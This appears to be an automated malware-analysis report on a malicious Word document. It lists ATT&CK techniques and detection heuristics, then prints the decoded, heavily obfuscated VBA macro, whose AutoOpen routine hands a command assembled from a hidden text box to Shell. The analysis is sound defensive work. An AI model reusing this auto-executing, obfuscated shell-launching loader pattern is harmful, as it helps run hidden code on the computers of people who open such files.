Verdict: MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon document opening. Heuristics indicate the use of `Shell()` to invoke `cmd.exe` and references to `PowerShell`, suggesting the macro's purpose is to download and execute a secondary payload. The ClamAV detection also confirms its malicious nature.
Heuristics (10)

- ClamAV: Doc.Malware.Valyria-6786330-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6786330-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script: `_ .Shell(iBSDBPPH, XsiLCDnVQ), DkjpjaP)` and `Set GssNhiLFaqkKBBcGB = VMPjMbrcUNBznoZu`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script: `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"`, `Sub autoopen()`, `wIkJMutiz`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7708 bytes |

SHA-256: 2cbb8b0926b1c17771262d686168f534df404019329b5c7bc039e72cec21a020

Detection (macros.bas):
- ClamAV: No threats found
- Obfuscation or payload: likely. 213 of 250 identifiers look randomly generated (e.g. 'nCtHOvuHBWVrSHtSWGHIjutQ'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "lQknRLjWSswoaR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
wIkJMutiz
End Sub
Attribute VB_Name = "wEwXqkddllPSQ"
Function wIkJMutiz()
On Error Resume Next
Set qtZYbMPPHkhoaONcofJj = jQOGabknnMCMUwTAVhIwAP
Select Case pJJRtAHrloqGdLRA
Case 244070039
bTXfcGPtbSwBnlUEYwRJ = njVRXdrqpDhXQYvpKhCCzYo
jBFmYmUjboonBOEdXDmPQdW = 83998068
OOPOHrOrbhWYFRDiwvc = HnvdZiwmZcFfsMKXFUTwa
Case 313935757
hiFSlijSitcRbSmpcvb = CByte(zbrfsHfdibfJMNOvT)
KDtKXlPviETirBwd = ChrW(GqZZiDDoGOTFNEqWPlX)
pDFQwYaJzkiKimIEunf = Log(qVRXwqUAcIbPbE)
End Select
Set UtDpjzKEVRRCpWCBLzNUYr = qTqRfwlmpuflJWrKIEf
Select Case joQvoXWljiSPcUN
Case 146343180
iiGjibHKksfTmEQtjpCCuc = bADHcPJpJVUaZZZ
NJlEirRziCWtiKT = 314038808
WfjbTfubDVzRdqU = kptJYdjiFdZtPKwB
Case 163401679
DtqdtiqdbVTfALCjuU = CByte(mjsvAVqFBLsWwtImaTH)
OSvBOOadNqfPibmoKwpHDYoR = ChrW(wXmrZbQnZLTkrhlvNrKfc)
UGTbbdzsqddSPqoloOPcEPS = Log(TRDLpjdmFFDfYz)
End Select
Set TZcSXzscDVzdmoC = fkhjRzfKiZMNouuj
Select Case wYzwfQHjlGHzRiDV
Case 261131958
bbuoUuSkzmioJbNS = PFOAUZDfsXMRvIrAjSHRJE
fuSVBzzjjzpnQZ = 91229143
CqJbWGSCinndIGB = KCiFCEChvrcSFUbbSLEa
Case 5660799
jZcPrNJUYdzLcNqIFwob = CByte(fdzzJMMKzBbdhVJcmMoX)
SzUtsNkJFGlZwBvcRiB = ChrW(JbbWhvshjSlzDDMdfDRzbBrv)
EjTNAUinaSrXwMwUDdnUmW = Log(pSzORBVHjjjdMYTjzHLclUG)
End Select
Set jTDwUwGbmjJEIDfnoRtvqo = afpURFuQVAzKIYiqwXlKTuK
Select Case OwRBatazrccRiipWrQ
Case 260967243
ItXPFazXFdWfVW = SospcaASfvRMSiO
DHGKVbBwzwCtNGzwH = 161216422
izaLdIarUoOfpqLTYO = krmwpjYGEZwUEtMj
Case 129240892
wdBvjhIlQMDCmYiwofvC = CByte(iECVSVTKldJrqckJpHFoE)
LCCmZmIFjlQrRYzZR = ChrW(obijuLwwzmwYqOjO)
zTjwjCjwYawKLJPqtzdkbIr = Log(cpVGIvCKCfAGlPIYwnVkzm)
End Select
Set IOMNtkdzqBIoDt = dzIkpYodnJFVqKmhspQh
Select Case JQVBSYKPrDZwWpYpwHc
Case 132176974
YEoPmoEUPzmMFThmiWAiO = FjZTVOstioMpkMhmjjGvbEmj
VqCPkcpWcwIpTTpbV = 114686649
zPjVEwqRYTUBtqCzXpdzMXTI = ZzNPQTFmpjCmUzTt
Case 71227000
DHzOwQTSlsTlcwaHf = CByte(dBHzOOEGANCrKDBFQBQKwwww)
NTEGFLNSVQJJDsiKrQFPu = ChrW(PjXjZqUzhFJSBvAAuCpZo)
svNJiAHfqjnjDUjZmWzViE = Log(krmKrWDZUsbrbT)
End Select
Set zdMpPMIHwOLhnMPL = SNLQjofSVHrpRECZ
Select Case ovhmhiqAGzTAisCmf
Case 277513001
iwQojXuEQSjKIIZYTdY = iUQcpMRmOpCmOauSXGAPm
ZiZoKsJUiIGEzJjozUFH = 277042229
PuwhNGANcJwAvhCBBYd = GufJdlljHfJfowTfrdfCUVf
Case 324792420
zOzlzThiwVVPnEb = CByte(RFzASMwNXJXtbZkOhC)
XmzJLcBrcwQEZEhCPizn = ChrW(RlOownDWkGhlYEiTwlXRU)
PGFwptWVfkOuFBjVPo = Log(VsrjTBzwjTzZVRzVHjzwJzPb)
End Select
Const XsiLCDnVQ = 0
Set NElwOqSowzjVlnFfmTokB = pvFsuQQRRfwpQqjJkGHAHv
Select Case KjfFPlvsuhbOprWwCYjhB
Case 161699015
XOwcihdBftKvLOKAjWnCIocq = OKEbbOklkHqQIMKQf
UfvLhrXzKOWnimIKUWYZDfaJ = 175697927
TjXKcldsHKWDdMD = EVPwZEIwrosFspFmkaY
Case 265482981
AllKpiznRtLWcbEtiiP = CByte(YSotXASFjSDoPzDjilj)
KLaujjPOBtGrJNDhzrn = ChrW(MsDzqXGdXUOswpQNstMolD)
qLLfCvVmmwuNSH = Log(EJcmrjiOtTzqpEfzDIo)
End Select
Set fcsbQMiQCHOtFzoY = VWvBKoHzDaNEacPYBzBnOJto
Select Case dTnuBtlzEKUCLUolcNmU
Case 78999373
fwVEBnkkMcHYhUUECjb = VSuVpcNClvHTRBo
YzszNUzrunnTQXKFtEGNDz = 93170079
aiwQVoGjjjjFoitAUDb = ptlOlBaMvbkYiT
Case 154795001
WjWFjHmkrFROKFsAYLjj = CByte(kfTOukFwHWUGOinhVWiGBXfk)
BpijAXkrimBCrlWh = ChrW(jiwHwaETDpAZuMAiDtvWMH)
kPjsmiikLZNnwoDFPdQzijSn = Log(AUosbLbcjMsPiSoYEoz)
End Select
Set IVuVwJnzqbQCYWb = lITBGjYLIbAXsobW
Select Case qqiZQiLiBBPfoMGCh
Case 296296185
zBAcwiMXIQFCztlijskV = IWFfJfTPuUKvzXPqOlqD
COwwPlDdZJwXzqf = 309760530
nCtHOvuHBWVrSHtSWGHIjutQ = UKOYzhjvQwoJAnSCrNPhm
Case 44670684
DEdjYmRsIcVulj = CByte(EpmvBIFIWToGojiizNHLT)
zLJzFfhithWIJavqEu = ChrW(vHQjjcLitWjiUPjramBCabsa)
jfXDnIINNYNhccX = Log(AnHMDBtZjUDDsWTOqbwzobF)
End Select
Set YKddUFVHRiLnJKswNm = cUzjZbUiYwBrBJYurMi
Select Case tGOjqjZOJTiBwNSD
Case 173200272
DBAawLPnKdkQAlibfVFO = qBGVERAsnrVTNIhKTJDUCY
dsSsWXhwzMnMzuFstOvWlPwm = 191103109
RLLCtnRFcclZiVGvXHawhPOR = FHCKNvfPZGVkuSAu
Case 305682072
cGTkaQqspMjPBzuso = CByte(PuPjGKEOkKdpZBmwlLqU)
mUVGTiJFYqBdUfzBvAJj = ChrW(jfOzmfdCLiCTzdau)
mbvJLUcLFVnwpLjoVFo = Log(GjCjCMHwJVCYHWN)
End Select
iBSDBPPH = lQknRLjWSswoaR.TextBox1 + zUTEFUq + HqWKwK + aokNE + qAjaFZht + RwQmX + uCDYWtY + fddXOKqG + dECAGrXS + XqiQjEZ + uvwLhku + NdRPOS + hvZmFE
Set NNdGcQIiTSCVHYOUzuUBVZG = LzBQktSrkKklEBwafk
Select Case miSXjoJwKicYnGHufPrzZA
Case 72631735
zncPwwuVlkTotZSbbvHJI = wizGQLomPmXhZvMuzMoGn
nSBFwPWisBcLrz = 114911384
hjhwVhQLAWPhvuVBwtriFLO = QluVENEOcHiEZohGCpF
Case 175768003
pizjbNwFmmWUIi = CByte(mvHmRAEoPQbJLlcQFnYbD)
ocAGIqVIkRGwTHhSJzkuiQAD = ChrW(UJWQhjHjqGfmLrOSHjKDMS)
iniZqJNYcwTojzsChw = Log(cACfzHWbakpAZBnnc)
End Select
Set GNviLTHUVrwpqtPu = QpHAcFWAqBjSbOjZbhZAObZE
Select Case fflFJakuHnwALiHZiURbCud
Case 108125856
OLqujpQCFzZlvhawY = bhYPDSajGHdslCUouO
AXzizFjhojnqfdaBirwIYTz = 232343188
ZNMXQGnMCXvdzaJ = kmATQwOKAmwvGVjXOZ
Case 162020694
UKYczicFiYjRolojzQsazBW = CByte(KrFjrYPaBRBZOXTlVIfc)
fGUhzYwjzsTnuS = ChrW(ZwOGJJPXjOSbwHF)
VubfkkwrzQuEYilUFLMZtZS = Log(PjlThwBYsCztTnXozXGsOLw)
End Select
zWlvjzw = Array(hPBzfKC, VLWlsB, nXbWSa, Interaction _
_
_
_
_
_
_
_
.Shell(iBSDBPPH, XsiLCDnVQ), DkjpjaP)
Set GssNhiLFaqkKBBcGB = VMPjMbrcUNBznoZu
Select Case ljktcBiIzSnaprnziwdz
Case 173283479
QVEOzEcDwkGXrXQQtLjX = IDBiWNwEpwuDFSPoN
ifuWDUSAQjSFST = 16938488
HRCjbrizHoLTlEBbf = CrVmAhMVwPljibB
Case 272539931
zmdcmBuOOIwOLhqZ = CByte(RKvVQUWFuPNXKkSw)
DpCfPqaYlZOGlhuKTKqupjR = ChrW(WsljrEYjSRdBXfB)
UwivIzIiSMqabBEWYv = Log(WFtjhBhoUEtnnIW)
End Select
Set wXuzMWPLYADiwbzkPh = MuUwadFFRpHsWZcYdUXJwAo
Select Case azifiwuTuASYdbT
Case 142005449
QwWRIhFTCTQsXwM = OVcwZaUvnzWGDuB
BCfBRpSQZLccdb = 149594902
GSPFrWhqibdKLw = HSPqVRKoYDMZNwrRM
Case 178018776
zkfvJfUpXqLIFavUK = CByte(kBmwiqCizTrmJRjsz)
cWFLBbmzNvGwSihCbZjC = ChrW(otihAwlhuYMbPsn)
ZzKJjdHYwBNEGqJ = Log(wYndadAdBQTWuXDm)
End Select
Set EmWRFHiVQiMEZcmcdB = KfKjKfowRQERHH
Select Case lnFhmrnOKhhNJfWlTkDwotGM
Case 251990940
KMFLREwdrwWwPIWQA = cSfQuflhEJHrhtvVhaJwPdQj
XOWVubYsGjUluSaakznVAR = 194471199
tbwGCjwBzcWQOM = hjwbJbjmIjYfidKn
Case 43792362
VbSfRqWkSlSvJLYoFmBpT = CByte(KpoWiEUYooQftlrCRHE)
IzUMaMHpXYlQRvQdrvM = ChrW(QuzdfiSnzDUtluRMU)
wRwiAPCzNzUOLWvlIOA = Log(jvuUsUErfWiEJPwuWlthajQ)
End Select
End Function